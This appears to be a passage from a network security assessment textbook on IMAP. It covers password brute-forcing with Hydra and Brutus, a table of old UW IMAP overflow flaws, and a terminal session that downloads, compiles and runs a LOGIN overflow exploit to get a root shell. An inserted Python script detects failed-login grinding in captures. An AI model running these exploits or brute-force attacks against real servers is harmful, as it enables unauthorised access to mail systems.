10.4 IMAP

Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143. The IMAP protocol is much like POP-3; a user authenticates with a plaintext network service and can then collect and manage their email.

Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP), distributed from the official UW IMAP site at http://www.washington.edu/imap/. Mark Crispin (http://staff.washington.edu/mrc/) invented and maintains IMAP, which currently uses IMAP4rev1 as the standard server protocol (RFC 3501).

10.4.1 IMAP Brute Force

As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus and Hydra do an excellent job brute-forcing valid user-account passwords from both Unix-based and Win32 GUI environments. As mentioned earlier, they can be downloaded from:


Like POP-3, IMAP services are notoriously susceptible to brute-force password-grinding attacks because they don't enforce account lockout policies and often don't log unsuccessful authentication attempts.
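Because the server itself may record nothing, the failed attempts are often only visible on the wire. The following is an added example (not code from the original text): it walks captured IMAP sessions, tracks tagged LOGIN commands (usernames sent as atoms, quoted strings or literals, per RFC 3501) to their tagged NO/BAD completions, and counts failures per source address. The capture lines and addresses are constructed for the example.

```python
import re

# Tagged LOGIN command: tag, then the username as an atom, quoted string or literal {n}
LOGIN_RE = re.compile(r'^(\S+)\s+LOGIN\s+(\{\d+\}|"(?:[^"\\]|\\.)*"|\S+)', re.I)
# Tagged completion result from the server; untagged "*" and "+" lines never carry a pending tag
RESULT_RE = re.compile(r'^(\S+)\s+(OK|NO|BAD)\b', re.I)

def unquote(s):  # IMAP quoted string -> its value (\" and \\ escapes); atoms are returned unchanged
    return re.sub(r'\\(.)', r'\1', s[1:-1]) if len(s) >= 2 and s[0] == s[-1] == '"' else s

def parse_session(lines):
    """One captured session as "C: "/"S: " prefixed lines. Returns (attempts, failures):
    attempts maps tag -> username per LOGIN; failures lists usernames whose LOGIN drew NO or BAD."""
    attempts, failures, pending, literal = {}, [], {}, None
    for line in lines:
        side, _, payload = line.partition(": ")
        if side == "C":
            if literal is not None:                 # username arrives as literal data (ASCII assumed)
                tag, n = literal
                attempts[tag] = pending[tag] = payload[:n]
                literal = None
            elif (m := LOGIN_RE.match(payload)):
                tag, user = m.groups()
                if user.startswith("{"):             # literal: the next client line holds n bytes
                    literal = (tag, int(user[1:-1]))
                else:
                    attempts[tag] = pending[tag] = unquote(user)
        elif side == "S":
            m = RESULT_RE.match(payload)
            if m and m.group(1) in pending:          # tagged completion of a LOGIN we saw
                if m.group(2).upper() != "OK":
                    failures.append(pending[m.group(1)])
                del pending[m.group(1)]
    return attempts, failures

def noisy_sources(captures, threshold=3):
    """{source_ip: [session_lines, ...]} -> {source_ip: failed LOGIN count} for sources at or over threshold."""
    counts = {src: sum(len(parse_session(s)[1]) for s in sessions) for src, sessions in captures.items()}
    return {src: n for src, n in counts.items() if n >= threshold}

# Constructed captures (not real traffic): one source grinding "alice", one user mistyping twice
GRINDER = ["S: * OK example.org IMAP4rev1 server ready",
           'C: a001 LOGIN alice "pass word"', "S: a001 NO LOGIN failed",
           'C: a002 LOGIN "alice" letmein', "S: a002 NO LOGIN failed",
           "C: a003 LOGIN {5}", "S: + Ready for literal data", "C: alice qwerty",
           "S: a003 NO LOGIN failed", "C: a004 LOGIN alice hunter2",
           "S: a004 BAD Command argument error", "C: a005 LOGOUT", "S: a005 OK LOGOUT completed"]
TYPOS = ["C: x1 LOGIN bob secre", "S: x1 NO LOGIN failed", "C: x2 LOGIN bob secrett",
         "S: x2 NO LOGIN failed", "C: x3 LOGIN bob secret", "S: x3 OK LOGIN completed"]
CAPTURES = {"203.0.113.7": [GRINDER], "198.51.100.2": [TYPOS]}
```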

10.4.2 IMAP Process Manipulation Attacks

Since 1997, a handful of remotely exploitable security vulnerabilities within IMAP2bis and IMAP4rev1 services have been publicized; they are summarized in Table 10-5.

Table 10-5. Remotely exploitable IMAP vulnerabilities

CVE name    Notes
            Washington University IMAP 4 (IMAP4rev1 10.234) and prior AUTHENTICATE command overflow
            Washington University IMAP 4.1beta and prior LOGIN command overflow
            SuSE Linux IMAP server allows remote attackers to bypass IMAP authentication and gain privileges
            Washington University IMAP 4.7 (IMAP4rev1 12.264) post-authentication LIST command overflow
            Washington University IMAP 2000c and prior post-authentication BODY command overflow

The serious unauthenticated vulnerabilities in IMAP services are CVE-1999-0005 and CVE-1999-0042. Exploit scripts for the AUTHENTICATE command overflow are available for multiple platforms (including BSDi, Solaris, and Linux) at:


The second unauthenticated vulnerability is the IMAP LOGIN command overflow, for which a good exploit script is available at http://packetstormsecurity.org/Exploit_Code_Archive/imaps.tar.gz.

After finding the correct offset to use with the exploit script, it is very straightforward to compromise a vulnerable Linux host, as shown in Example 10-11.

Example 10-11. The IMAP2bis LOGIN command overflow in action

# wget http://examples.oreilly.com/networksa/tools/imaps.tar.gz
# tar xfz imaps.tar.gz
# cd imaps
# make
cc -O2 -o imaps imaps.c
imaps.c: In function `imap':
imaps.c:35: warning: function returns address of local variable
# ls
hey.sh  imaps*  imaps.c  include/  makefile  other/  readme
# ./imaps 100
Connecting to on port 143.
* OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02

uid=0(root) gid=0(root) groups=0(root)